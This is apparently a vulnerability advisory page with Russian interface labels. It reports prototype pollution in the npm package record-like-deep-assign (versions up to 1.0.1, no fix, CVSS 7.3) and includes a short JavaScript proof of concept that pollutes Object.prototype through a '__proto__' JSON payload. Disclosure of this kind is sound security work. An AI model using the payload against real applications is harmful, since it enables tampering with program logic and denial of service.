Описание
Prototype Pollution in record-like-deep-assign
All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.
PoC
const deepAssign = require('record-like-deep-assign');
let obj = {};
console.log("Before being polluted: " + obj.polluted);
EVIL_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
deepAssign({}, EVIL_JSON);
console.log("After being polluted: " + obj.polluted);
Пакеты
Наименование
record-like-deep-assign
npm
Затронутые версииВерсия исправления
<= 1.0.1
Отсутствует
Связанные уязвимости
CVSS3: 7.3
nvd
больше 4 лет назад
All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.